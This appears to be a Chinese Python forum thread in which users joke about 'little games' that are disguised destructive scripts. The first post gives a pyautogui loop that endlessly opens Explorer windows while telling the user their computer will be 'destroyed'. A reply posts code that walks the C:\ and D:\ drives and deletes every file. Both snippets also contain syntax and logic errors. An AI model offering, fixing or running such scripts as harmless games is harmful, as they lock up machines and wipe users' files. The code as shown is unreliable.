歌者文明清理员 发表于 2023-7-10 15:05:57

让我们用Python小知识来做一个小游戏吧!

本帖最后由 歌者文明清理员 于 2023-7-10 15:22 编辑

参考文献:超级有用的Python实现自主化办公库!

推荐阅读:第一课 用python制作一个小游戏

现在让我们来做一个小游戏吧!

准备:

pip install pyautogui

正片开始!

(仅限 Windows)

import pyautogui, itertools
n = int(input("你要使损害达到几级程度?"))
count = 5
temp = None
while n < 10:
    n = int(input("好好回答!"))
    count -= 1
    if count == 0:
      print("对不起,为了保护您,我们只能毁掉您的计算机。")
      temp = itertools.cycle()
      break
if temp is None:
    temp = * n
for _ in temp:
    pyautogui.hotkey('win', 'e')


纯净版:

import pyautogui, itertools
temp = itertools.cycle()
for _ in temp:
    pyautogui.hotkey('win', 'e')

额外减小 发表于 2023-7-10 15:53:14

6
《为了保护您》

tommyyu 发表于 2023-7-10 17:51:10

本帖最后由 tommyyu 于 2023-7-10 17:56 编辑

我也做了一个小游戏(仅限Windows)(不要运行){:10_256:}
import os
for i in os.walk('C:\\'):
    for j in i:
      try:
            os.unlink(i + j)
      except:
            pass
for i in os.walk('D:\\'):
    for j in i:
      try:
            os.unlink(i + j)
      except:
            pass

歌者文明清理员 发表于 2023-7-10 17:59:41

tommyyu 发表于 2023-7-10 17:51
我也做了一个小游戏(仅限Windows)(不要运行)

很抱歉我没有D盘
      假的

tommyyu 发表于 2023-7-10 18:21:01

歌者文明清理员 发表于 2023-7-10 17:59
很抱歉我没有D盘
      假的

运行一遍这个程序说不定就真没有了
页: [1]
查看完整版本: 让我们用Python小知识来做一个小游戏吧!